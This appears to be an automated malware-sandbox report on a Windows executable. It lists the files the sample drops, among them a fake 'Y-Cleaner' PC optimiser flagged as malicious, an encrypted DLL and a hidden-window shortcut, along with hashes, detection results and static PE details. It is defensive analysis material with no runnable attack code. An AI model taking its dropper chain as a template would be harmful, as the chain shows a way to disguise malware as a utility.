                                          Preview:MDMP..a..... .......\.[g............4...........8...<.......T....,..........T.......8...........T...........PB...s..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.............[g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC933.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8300
                                          Entropy (8bit):3.6906134441117393
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJVCv6GcNe6YEIsSU/gQgmfBGW1pDM89bYxsHsf0Im:R6lXJY6O6YEjSU/lgmfZ5YxsMfa
                                          MD5:6B9035849145A06774A2CB4116521B97
                                          SHA1:FFAAC7FFE23234BA33617E2C192142C6618F57FC
                                          SHA-256:6EBA482C4FD492F4A50BA31347D01893C1A70B9654A049DCA7D453C8E3DEEEA0
                                          SHA-512:B8998C33FE419DB9E012B36B50A9566B35FD64A3A636AD62F29572282CA48EBC40EE1F7F270EC783B518DAE6A0AD1BA83CDB736FF54537FDBE2FF3031F80994B
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC953.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4541
                                          Entropy (8bit):4.430596009399601
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zspJg77aI9G5WpW8VYYYm8M4JBRFFm+q82ikS+nd:uIjf7I7EI7VoJGCJ+nd
                                          MD5:3EF1F0FBFF6F56385655A4B0602B2331
                                          SHA1:93CDB4EEB6BFCE1844C50B81B7BDB8A27459F0C7
                                          SHA-256:76D7B7ACAC49D256563282480512A1FC6BCB09386958AD7E26D8AFD39A7543D6
                                          SHA-512:13BA747FC002EAE30CA81524ED5F1F43E42C383E09D7F9F36E3C294B5E0EE1C436275A8B014E0EBA837301D6432841CFB371AF23942DBC5353B8DF2CCA7F5ABA
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629055" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\fuckingdllENCR[1].dll

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):97296
                                          Entropy (8bit):7.9982317718947025
                                          Encrypted:true
                                          SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                          MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                          SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                          SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                          SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\key[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):21
                                          Entropy (8bit):3.880179922675737
                                          Encrypted:false
                                          SSDEEP:3:gFsR0GOWW:gyRhI
                                          MD5:408E94319D97609B8E768415873D5A14
                                          SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                          SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                          SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:9tKiK3bsYm4fMuK47Pk3s

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Joe Sandbox View:
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: Mk4JWS27SO.exe, Detection: malicious, Browse
                                          • Filename: BsVEQQnfyN.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\download[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\download[1].htm

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0

                                          C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                          C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                          C:\Users\user\Desktop\Cleaner.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 04:12:59 2024, mtime=Fri Dec 13 04:12:59 2024, atime=Fri Dec 13 04:12:59 2024, length=1502720, window=hide
                                          Category:dropped
                                          Size (bytes):2222
                                          Entropy (8bit):3.8744865980661203
                                          Encrypted:false
                                          SSDEEP:24:8gkCfE8OrNCRZgKI5KNrIiCGfxAVxg6ivN0KiCS8KiCSHO4Zg68qKiCSO1PhNqyT:84p7RbDfCbg6ivN0CFZg68qihEyg
                                          MD5:60672C17702CCFE838846CAC5446D481
                                          SHA1:FA5472AFEB6B95C2B5396243F1F1AA760FA2C28D
                                          SHA-256:55610B2100B771F1BC7C8F1E513122A52A1764434462AAC88A7555E61005E79A
                                          SHA-512:BC70DC43AC16C0051CFA10CE84C59047653C0F34AD4928ECBC19470F3D15E6DB8831838659845AF3F5E885ABDEF698DC1A244351CF58B9C01A761004A4F0A87F
                                          Malicious:false
                                          Preview:L..................F.@.. ...Z.r..M..Z.r..M..Z.r..M..........................B.:..DG..Yr?.D..U..k0.&...&...... M.....UQ+..M...t|..M......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y|)....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......Y{)..Local.<......DWSl.Y|)....V.....................I...L.o.c.a.l.....N.1......Y|)..Temp..:......DWSl.Y|)....\.....................G"..T.e.m.p.....~.1......Y.)..VF1VAS~1..f......Y.).Y.)..........................O...v.f.1.v.A.s.w.4.V.1.4.D.J.W.w.e.e.1.e.C.d.f.d.3.e.4.....h.2......Y.) .Y-CLEA~1.EXE..L......Y.).Y.)....;.........................Y.-.C.l.e.a.n.e.r...e.x.e.......z...............-.......y...........A.o......C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.v.f.1.v.A.s.w.4.V.1.4.D.J.W.w.e.e.1.e.C.d.f.d.3.e.4.\.Y.-.C.l.e.a.n.e.r...e.x.e.K.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421495614865974
                                          Encrypted:false
                                          SSDEEP:6144:qSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:ZvloTMW+EZMM6DFy403w
                                          MD5:836C4CC521C374F9277B6C75A26EEDBB
                                          SHA1:9B7D72B9A0D0ABB058DBB2332EB9BC3322400E36
                                          SHA-256:802950328BEE2AA94F1EAC857339049B8E9C972ECCBDC2BCED7502C98FCD5C2C
                                          SHA-512:493BD6CBBEC60E69741D4F32E68AA7F683FB283222462D1B3B21D55963F303BABCC46E0E92666464BC15314E0C3ADAA95FF338949985C5A6DF9A5BD38771A644
                                          Malicious:false
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmz...M...............................................................................................................................................................................................................................................................................................................................................S..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.934093114361708
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:1'933'312 bytes
                                          MD5:602574ce5a6eea6388a2d30a490ddfa9
                                          SHA1:efe09508381076205f1b23a03b1baea6d36eaa95
                                          SHA256:9edabdb564b79176743506ba6466765f5193ab2ce29f7bcbbb7f1a694ed54768
                                          SHA512:2425affe7ddb06e8beaaf9ebd430a6fef7b0789fe8a74251cd689da8f7722189a492b0047278933adbeb8bc8e77aafee8a360a0102f932b8ca9838525222fa00
                                          SSDEEP:49152:/EQd6B+ED8g4wZMiR2y4M8LVzjaYSJFwDqmRJ4fLzWmiD:/tojDf7ZiCgVzW2OYJ4X
                                          TLSH:D0953363DA88DE7CE881C7718531CDF1FE6DAA694E612476922DCF79C8337188BE5042
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................

                                          File Icon

                                          Icon Hash:c7a99a8aa651798c

                                          Static PE Info

                                          General

                                          Entrypoint:0xc54000
                                          Entrypoint Section:.taggant
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007F8A2D24B49Ah
                                          divps xmm3, dqword ptr [00000000h]
                                          add cl, ch
                                          add byte ptr [eax], ah
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Rich Headers

                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x42105a0x6e.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40e0000x12168.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x847e580x18lerqcswm
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          0x10000x40d0000x254002678ed13b8096f728f96d78c3388c372unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x40e0000x121680x9400ed97dec821d49e679673e5958968c338False0.9627586570945946data7.887337074005302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata 0x4210000x10000x200de906030ab088402d586a76aa6666758False0.15234375data1.0884795995201089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          0x4220000x28b0000x20056befbbddf2663c6d5eca3d812e41495unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
